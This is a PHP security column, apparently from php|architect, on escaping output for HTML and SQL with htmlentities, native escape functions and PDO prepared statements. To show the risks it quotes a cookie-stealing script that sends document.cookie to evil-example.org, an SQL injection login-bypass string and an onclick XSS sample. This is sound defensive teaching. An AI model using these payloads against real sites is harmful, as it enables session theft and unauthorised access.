Escape Output

This article was first published in the “Tips & Tricks” column in php|architect magazine.

Filter Input. Escape Output. You’re hearing an awful lot of this from me lately, and as one person noted, “It’s great that they’re rubbing this topic in.” Indeed. This month’s Tips & Tricks wraps up the recent focus on security with a discussion on escaping output, why it’s important, and how to do it.

In the previous three Tips & Tricks columns, I’ve taken time to fully explain why all input should be filtered, and I’ve offered tips on how to filter your data so that the data you work with and save isn’t considered tainted. However, security-conscious programming doesn’t end with filtering data. Sure, now the data conforms to expectations, but it may still contain characters that have special meaning depending on the medium in which your application chooses to display it. That medium may be HTML, SQL, XML, WML, etc.

Thus, we must escape output.

What is output? Output is any data that leaves your application bound for another client or application. The receiving client or application expects the data to be of a specific format (HTML, SQL, etc.), and that format may include characters or other information with special meaning to the receiving client/application. The data being sent, however, might (and probably does) contain special characters that should not be interpreted with any special meaning by the receiving client.

Data may leave your application in the form of HTML sent to a Web browser, SQL sent to a database, XML sent to an RSS reader, WML sent to a wireless device, etc. The possibilities are limitless. Each of these has its own set of special characters that are interpreted differently than the rest of the plain text received. Sometimes we want to send these special characters so that they are interpreted (HTML tags sent to a Web browser, for example), while other times (in the case of input from users or some other source), we don’t want the characters to be interpreted, so we need to escape them.

Escaping is also sometimes referred to as encoding. In short, it is the process of representing data in a way that it will not be executed or interpreted. For example, HTML will render the following text in a Web browser as bold-faced text because the <strong> tags have special meaning:

<strong>This is bold text.</strong>

But, suppose I want to render the tags in the browser and avoid their interpretation. Then, I need to escape the angle brackets, which have special meaning in HTML. The following illustrates the escaped HTML:

&lt;strong&gt;This is bold text.&lt;/strong&gt;
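The same transformation can be sketched in PHP. This is only a minimal illustration, assuming htmlspecialchars() (one of the functions discussed later in this column) as the escaping function; the variable names are made up for the example.

```php
<?php
// Raw text containing characters that have special meaning in HTML.
$raw = '<strong>This is bold text.</strong>';

// htmlspecialchars() converts &, <, > and quotes to their HTML entities.
$escaped = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');

echo $escaped, "\n";
// &lt;strong&gt;This is bold text.&lt;/strong&gt;
```

A browser receiving the escaped string displays the tags as text rather than rendering bold type.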

Why Escape?

So, you run a Web-based forum, and you don’t have a problem with users entering the occasional HTML tag. Why should you escape your output?

Here’s why: Suppose this forum allows users to enter HTML tags. That’s fair enough—you may want to allow them to enter bold-faced or italicized text—but then it outputs everything in its raw form—everything. So, all HTML tags get interpreted by the web browser.

What if a user enters the following?

<script>
location.href='http://evil-example.org/steal-cookies.php?cookies=' + document.cookie;
</script>

Any subsequent user who is logged into the forum and visits this page will now be redirected to http://evil-example.org/steal-cookies.php and any cookies set by the forum can be stolen.
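To see what escaping changes here, the sketch below runs the same payload through htmlspecialchars(). The $post variable is a hypothetical stand-in for a stored forum message, and the choice of htmlspecialchars() with ENT_QUOTES is an assumption made for illustration.

```php
<?php
// Hypothetical forum post submitted by a malicious user.
$post = "<script>\n"
      . "location.href='http://evil-example.org/steal-cookies.php?cookies=' + document.cookie;\n"
      . "</script>";

// Once escaped for HTML, the markup is shown as text instead of being executed.
$safe = htmlspecialchars($post, ENT_QUOTES, 'UTF-8');

echo $safe, "\n";
```

The angle brackets arrive at the browser as &lt; and &gt;, so no script element is ever created.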

Let’s look at another example. Many sites contain login forms, which usually consist of two fields—a username and a password. When a user enters a username and password, the application may enter the values into an SQL statement, as in the following:

$sql = "SELECT * FROM users
        WHERE username = '{$_POST['username']}'
        AND password = '{$_POST['password']}'";

This statement will work just fine as long as a user enters a proper username and password, but suppose a user enters something like example' OR 1 = 1; -- as the username? The value of 1 will always equal 1, and since the user properly closed the single quote in the statement, the OR clause will be treated as part of the SQL, and everything after the -- will be ignored (at least in most database engines) as a comment. Thus, the user is able to log in without an account.
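A short sketch makes the problem visible by printing the statement that would be sent to the database. The $post array is a hypothetical stand-in for $_POST so the snippet can run on its own; nothing is executed against a database.

```php
<?php
// Simulated form submission; in a real request these values come from $_POST.
$post = array(
    'username' => "example' OR 1 = 1; --",
    'password' => 'anything',
);

// The same unsafe interpolation as above, repeated only to expose the result.
$sql = "SELECT * FROM users
        WHERE username = '{$post['username']}'
        AND password = '{$post['password']}'";

echo $sql, "\n";
```

In the printed statement, the quote supplied by the user closes the username literal, and the OR clause sits outside it as part of the SQL.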

The first step to ensure situations such as these do not occur is to filter all input to ensure that no unexpected characters appear in the data. See the July 2005 through September 2005 issues of php|architect for my full discussion on input filtering.

After filtering, be sure to save the raw data. Do not escape it before storing. If escaped before storing, then it might be necessary to unescape it at some point in the future. For example, what if the data is escaped for HTML output and stored to a database table only to be retrieved later to output in XML or to PDF, etc.? Then, it must be unescaped to transport to those formats—and possibly escaped again to accommodate the new output medium. This process is bound to introduce more bugs to your code and could likely reduce the quality of the data. Thus, to make the most of your data, it is best to save it raw (after filtering) and escape only when outputting.
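As a rough illustration of escaping only at output time, the sketch below takes one raw value and escapes it separately for HTML and for XML. The sample value and variable names are assumptions for the example, and htmlspecialchars() with the ENT_XML1 flag is just one possible way to escape text for XML.

```php
<?php
// Filtered but unescaped value, as it would be stored in the database.
$raw = "O'Reilly & Sons <books>";

// Escape for an HTML page at output time.
$forHtml = htmlspecialchars($raw, ENT_QUOTES | ENT_HTML401, 'UTF-8');

// Escape the same raw value for an XML document, such as an RSS feed.
$forXml = htmlspecialchars($raw, ENT_QUOTES | ENT_XML1, 'UTF-8');

echo $forHtml, "\n"; // O&#039;Reilly &amp; Sons &lt;books&gt;
echo $forXml, "\n";  // O&apos;Reilly &amp; Sons &lt;books&gt;
```

The two results differ in how the apostrophe is represented, which is exactly why storing one pre-escaped form would force an unescape step later.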

Escaping output is not a terribly difficult process. At the least, it may require the addition of a few extra lines of code, or it may require a little more attention to detail. The important thing to keep in mind is the output format and the special characters that need to be escaped for that format. For the purposes of this discussion, I will cover escaping for HTML and SQL, since PHP has excellent built-in functions for handling output to these formats.

Escaping HTML

There are three main functions in PHP for escaping HTML: htmlentities(), htmlspecialchars(), and strip_tags().

In the case of strip_tags(), no special characters are actually escaped; instead, all HTML tags are removed. Using this function with no extra parameters is probably one of the safest ways to completely remove all HTML tags from output. I have seen user-defined functions that attempt something similar by removing all but a set of allowed tags, but these are rarely free of flaws and can introduce nasty bugs that leave the output too lenient. Likewise, strip_tags() offers the option to allow certain tags with the format strip_tags($str, '<p> <a> <b>');, but this is also too lenient: attributes are not stripped from allowed tags, so onclick events and the like persist in the output. Take the following code snippet, for example:

$str = '<p><b>Bold text</b><a href="#" onclick="alert(\'XSS\');">Link</a><img src="example.png"/></p>';
echo strip_tags($str, '<p> <a> <b>');

This code will output the following, complete with the cross-site scripting (XSS) in the onclick attribute:

<p><b>Bold text</b><a href="#" onclick="alert('XSS');">Link</a></p>

Rather than completely stripping the tags from output, a better alternative may be to escape all the tags, allowing them to render in the output. This is an easy task with htmlspecialchars() and htmlentities().

Both of these functions serve the same purpose: to convert special characters into their equivalent HTML entities. The main difference is that htmlentities() is more exhaustive, choosing to convert all characters with HTML character entity equivalents to their respective HTML entities. Thus, for its exhaustive nature, I will recommend htmlentities() as the better function to use to escape HTML output. For the above $str example, htmlentities() returns the following:

&lt;p&gt;&lt;b&gt;Bold text&lt;/b&gt;
&lt;a href=&quot;#&quot; onclick=&quot;alert('XSS');&quot;&gt;Link&lt;/a&gt;
&lt;img src=&quot;example.png&quot;/&gt;&lt;/p&gt;

In this case, however, allowing the <b> tags may be preferable, and so we can allow them by first escaping the output and then converting the selected HTML entities back to HTML with str_replace():

$str = htmlentities($str);
$str = str_replace('&lt;b&gt;', '<b>', $str);
$str = str_replace('&lt;/b&gt;', '</b>', $str);

This will ensure that we send only those special characters that we desire to have interpreted to the client. While this is a form of unescaping, which I mentioned earlier is not a desirable process, it is nevertheless a good alternative to using strip_tags() to allow certain tags, as it will ensure that any tags that contain undesirable attributes are not interpreted by the client. In addition, there is no guesswork involved here; I am not using a regular expression that I could potentially get wrong and, thus, introduce a hole in my application. I will always know what a <b> tag looks like after the angle brackets have been converted to their HTML entity equivalents, so it is easy for me to find and convert the tags back to HTML.
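The escape-then-restore approach can be wrapped in a small helper. The following is only a sketch: escape_allowing() is a hypothetical function name, not a PHP built-in, and passing ENT_QUOTES and UTF-8 to htmlentities() is an assumption added for the example.

```php
<?php
/**
 * Escape everything, then restore an allow-list of attribute-free tags.
 * escape_allowing() is a hypothetical helper, not part of PHP.
 */
function escape_allowing($str, array $tags)
{
    $str = htmlentities($str, ENT_QUOTES, 'UTF-8');

    foreach ($tags as $tag) {
        // Only the exact, attribute-free forms are converted back to HTML.
        $str = str_replace("&lt;{$tag}&gt;", "<{$tag}>", $str);
        $str = str_replace("&lt;/{$tag}&gt;", "</{$tag}>", $str);
    }

    return $str;
}

$str = '<p><b>Bold text</b><a href="#" onclick="alert(\'XSS\');">Link</a></p>';
$out = escape_allowing($str, array('b'));

echo $out, "\n";
```

Because a tag carrying attributes never matches the exact escaped form, the anchor with its onclick handler stays escaped while the plain <b> tags are restored.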

Escaping SQL

Similarly, PHP offers excellent built-in functions for escaping SQL statements according to the database engine used. For PostgreSQL, there is pg_escape_string(); for MySQL, mysql_real_escape_string(); and for SQLite, sqlite_escape_string(). If the native database functions provided in PHP for your engine do not offer a similar function, then PHP offers addslashes(), though I would advise that the database’s native escape string function is always a better alternative than addslashes().

Listing 1.
<?php
$clean = filter($_POST, $post_whitelist);
$username = mysql_real_escape_string($clean['username']);
$password = mysql_real_escape_string($clean['password']);
$sql = "SELECT * FROM users
WHERE username = '{$username}'
AND password = '{$password}'";
?>

Using the SQL example from earlier, we can escape it using mysql_real_escape_string(), as shown in Listing 1, where we first filter it using the filter() function I gave in the August 2005 issue. Thus, if a user enters the value example' OR 1 = 1; -- as a username, the SQL that is executed will be:

SELECT * FROM users
WHERE username = 'example\' OR 1 = 1; --'
AND password = 'password'

The single quotation mark is escaped and no results are returned because this user doesn’t exist—the user can’t gain access to the application.
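Escaping rules differ between engines, which is one reason the native function is preferable to addslashes(). As a hedged illustration that runs without a database connection, the sketch below uses SQLite3::escapeString(), assuming the sqlite3 extension is available. It is a different function from the ones named above and is used here only because it is static.

```php
<?php
// Value a malicious user might submit as the username.
$username = "example' OR 1 = 1; --";

// SQLite escapes a single quote by doubling it rather than adding a backslash.
$escaped = SQLite3::escapeString($username);

$sql = "SELECT * FROM users WHERE username = '{$escaped}'";

echo $sql, "\n";
// SELECT * FROM users WHERE username = 'example'' OR 1 = 1; --'
```

The doubled quote keeps the entire submitted value inside the string literal, just as the backslash does in the MySQL output above.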

Some database functions, such as the unified ODBC functions, mysqli, and PDO (in PHP 5.1), use the concept of prepared statements to prepare and properly escape an SQL statement. Listing 2 illustrates a prepared statements example using PDO. The SQL statement that is created will appear much like the one listed above, but PDO offers added functionality through the optional bindParam() parameters to define the type and length of data.

Prepared statements also exist in PEAR::DB and other database abstraction classes, but PDO offers much promise since it is built into the language and is thus much faster, with less overhead.

So, if possible, use prepared statements (with PDO, if possible). If they aren’t available, use the database’s built-in escaping function. If that isn’t available, then fall back on addslashes() as a last resort.
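As a self-contained sketch of the prepared-statement approach, the following uses an in-memory SQLite database so that no server is needed. The table, the account, and the submitted values are all hypothetical, and the pdo_sqlite driver is assumed to be installed.

```php
<?php
// In-memory SQLite database (an assumption so the sketch runs without a server).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Hypothetical users table with one account; the plain-text password
// only mirrors the simplified listings in this column.
$db->exec('CREATE TABLE users (username TEXT, password TEXT)');
$db->exec("INSERT INTO users VALUES ('alice', 'secret')");

$stmt = $db->prepare('SELECT * FROM users
                      WHERE username = :username
                      AND password = :password');

// The injection attempt is bound as data, never spliced into the SQL text.
$username = "example' OR 1 = 1; --";
$password = 'anything';
$stmt->bindParam(':username', $username, PDO::PARAM_STR);
$stmt->bindParam(':password', $password, PDO::PARAM_STR);
$stmt->execute();

$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo count($rows), "\n"; // 0
```

No row matches because the whole submitted string is compared against the username column as a literal value.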

Listing 2.
<?php
$clean = filter($_POST, $post_whitelist);
$db = new PDO('mysql:host=localhost;dbname=example', 'dbuser', 'dbpass');
$sql = 'SELECT * FROM users
WHERE username = :username
AND password = :password';
$stmt = $db->prepare($sql);
$stmt->bindParam(':username', $clean['username'], PDO::PARAM_STR, 25);
$stmt->bindParam(':password', $clean['password'], PDO::PARAM_STR, 16);
$stmt->execute();
?>

A Security-Conscious Mindset

The key to secure programming is having a security-conscious mindset. Filtering input and escaping output is just part of that mindset, but it takes more thought than simply copying code from elsewhere to introduce security to an application. It takes careful planning and diligent testing.

By now, I hope that you are well on your way to being a security-conscious programmer. I have introduced some tools and concepts to help you get started, and it is likely that you have thought of code you’ve already written and how to improve it using these principles.

So, have fun, good luck, and be sure to keep security at the forefront of a project. Security is not a design feature—it is an essential tool.